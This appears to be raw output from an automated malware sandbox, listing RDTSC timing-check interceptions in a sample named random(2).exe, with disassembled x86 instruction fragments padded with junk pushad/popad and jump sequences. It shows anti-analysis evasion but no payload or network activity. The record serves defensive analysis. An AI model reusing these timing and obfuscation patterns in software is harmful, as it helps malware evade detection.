Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C4240 second address: 6C4245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C4245 second address: 6C4251 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29453582DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C4504 second address: 6C4508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C4508 second address: 6C4538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F29453582DCh 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C4538 second address: 6C4552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2944535536h 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c jl 00007F2944535536h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push esi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C4552 second address: 6C4563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F29453582D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C4563 second address: 6C4567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C8B93 second address: 6C8BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29453582E1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C8EEE second address: 6C8EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6CA8D5 second address: 6CA8F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E6h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F29453582E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6CA8F9 second address: 6CA8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6CA8FF second address: 6CA92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F29453582E4h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 jnc 00007F29453582D6h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F099A second address: 49F09B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 499078A second address: 4990790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990790 second address: 49907F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2944535544h 0x00000014 sub si, B9E8h 0x00000019 jmp 00007F294453553Bh 0x0000001e popfd 0x0000001f jmp 00007F2944535548h 0x00000024 popad 0x00000025 and esp, FFFFFFF8h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F294453553Ah 0x00000031 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49907F4 second address: 49907F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49907F8 second address: 49907FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49907FE second address: 4990804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990804 second address: 499083B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 34h 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e jmp 00007F294453553Eh 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2944535547h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 499083B second address: 4990893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edx, 1875F780h 0x00000011 pushfd 0x00000012 jmp 00007F29453582E9h 0x00000017 jmp 00007F29453582DBh 0x0000001c popfd 0x0000001d popad 0x0000001e mov ax, BF3Fh 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov bx, cx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990893 second address: 49908E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F2944535542h 0x0000000f sub eax, 03053B58h 0x00000015 jmp 00007F294453553Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebx, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2944535545h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49908E1 second address: 4990912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 74h 0x00000005 call 00007F29453582E8h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29453582DDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990912 second address: 4990960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2944535547h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], esi 0x00000010 jmp 00007F2944535544h 0x00000015 xchg eax, edi 0x00000016 jmp 00007F2944535540h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990960 second address: 4990964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990964 second address: 499096A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 499096A second address: 4990970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990970 second address: 4990974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990974 second address: 4990978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990978 second address: 4990997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a mov cl, dl 0x0000000c movzx esi, dx 0x0000000f popad 0x00000010 mov edi, dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F294453553Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990997 second address: 4990A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0EB7E744h 0x00000008 pushfd 0x00000009 jmp 00007F29453582DDh 0x0000000e and ecx, 358EC086h 0x00000014 jmp 00007F29453582E1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d sub esi, esi 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F29453582E8h 0x00000026 adc ax, CE58h 0x0000002b jmp 00007F29453582DBh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esp+10h], esi 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F29453582E0h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990A0E second address: 4990A14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990A14 second address: 4990A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+14h], esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990A2B second address: 4990A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [edi] 0x0000000b jmp 00007F2944535546h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov cx, 3C8Dh 0x00000016 mov ax, 1489h 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov di, si 0x00000022 mov ebx, ecx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990A6B second address: 4990B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29453582DFh 0x00000009 or si, 89EEh 0x0000000e jmp 00007F29453582E9h 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F29453582E9h 0x00000022 xor esi, 2AED80D6h 0x00000028 jmp 00007F29453582E1h 0x0000002d popfd 0x0000002e mov bx, si 0x00000031 popad 0x00000032 push FC53D4BFh 0x00000037 jmp 00007F29453582E3h 0x0000003c add dword ptr [esp], 79C1759Dh 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F29453582E5h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990B11 second address: 4990B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, B322h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990B8C second address: 4990B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4990B92 second address: 4990B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00269 second address: 4A0026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A0026D second address: 4A00271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00271 second address: 4A00277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00277 second address: 4A0027D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A0027D second address: 4A00281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00281 second address: 4A00292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov edi, 66EB41B2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00292 second address: 4A002BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 mov eax, edi 0x00000009 jmp 00007F29453582E1h 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29453582DDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A002BD second address: 4A002FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F294453553Eh 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 jmp 00007F2944535540h 0x00000018 push dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A002FE second address: 4A00302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00302 second address: 4A00306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00306 second address: 4A0030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A0030C second address: 4A00369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 357C5091h 0x00000008 pushfd 0x00000009 jmp 00007F294453553Eh 0x0000000e or esi, 5C8911E8h 0x00000014 jmp 00007F294453553Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d call 00007F2944535539h 0x00000022 jmp 00007F2944535546h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F294453553Dh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00369 second address: 4A0037E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A0037E second address: 4A003D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F2944535541h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F2944535541h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F294453553Ah 0x00000025 pop eax 0x00000026 mov dx, 4426h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A003D2 second address: 4A003E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A003E9 second address: 4A003FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov ecx, edx 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ebx, 1CC58DE0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00434 second address: 4A00438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A0CA0 second address: 49A0CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A0CA4 second address: 49A0CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A0CAA second address: 49A0CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F2944535543h 0x00000012 mov si, FBCFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A0008 second address: 49A000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A000E second address: 49A0048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2944535540h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F294453553Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A0048 second address: 49A005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A005A second address: 49A0072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A0072 second address: 49A008D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A008D second address: 49A0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A0093 second address: 49A0097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A0097 second address: 49A00C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007F2944535548h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49A00C0 second address: 49A00C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F080A second address: 49F0810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0810 second address: 49F0838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F29453582E6h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0838 second address: 49F0855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0855 second address: 49F087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F29453582DDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F087B second address: 49F08D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007F2944535543h 0x0000000b jmp 00007F2944535543h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F294453553Bh 0x0000001d pop ecx 0x0000001e jmp 00007F2944535549h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F08D5 second address: 49F08E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F05A3 second address: 49F0635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F294453553Eh 0x00000011 mov esi, eax 0x00000013 pushad 0x00000014 jmp 00007F294453553Eh 0x00000019 pushad 0x0000001a mov cx, CBD7h 0x0000001e pushfd 0x0000001f jmp 00007F294453553Ch 0x00000024 and esi, 72026648h 0x0000002a jmp 00007F294453553Bh 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 sub esi, edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F2944535540h 0x0000003d jmp 00007F2944535545h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0635 second address: 49F0684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov cl, byte ptr [edx] 0x0000000b jmp 00007F29453582E0h 0x00000010 mov byte ptr [esi+edx], cl 0x00000013 jmp 00007F29453582E0h 0x00000018 inc edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F29453582E7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0684 second address: 49F069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535544h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F069C second address: 49F0700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test cl, cl 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F29453582E4h 0x00000014 xor si, D558h 0x00000019 jmp 00007F29453582DBh 0x0000001e popfd 0x0000001f mov bx, si 0x00000022 popad 0x00000023 jne 00007F294535823Bh 0x00000029 pushad 0x0000002a push ebx 0x0000002b mov dx, cx 0x0000002e pop ecx 0x0000002f popad 0x00000030 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F29453582E0h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0700 second address: 49F0775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d mov cl, 79h 0x0000000f call 00007F2944535541h 0x00000014 mov ch, 07h 0x00000016 pop edi 0x00000017 popad 0x00000018 mov dword ptr fs:[00000000h], ecx 0x0000001f jmp 00007F2944535548h 0x00000024 pop ecx 0x00000025 jmp 00007F2944535540h 0x0000002a pop edi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 call 00007F2944535543h 0x00000035 pop esi 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0775 second address: 49F07D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29453582E4h 0x00000009 adc si, 1068h 0x0000000e jmp 00007F29453582DBh 0x00000013 popfd 0x00000014 mov ax, D65Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop esi 0x0000001c jmp 00007F29453582E2h 0x00000021 pop ebx 0x00000022 jmp 00007F29453582E0h 0x00000027 leave 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx ebx, si 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F07D2 second address: 49F07D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
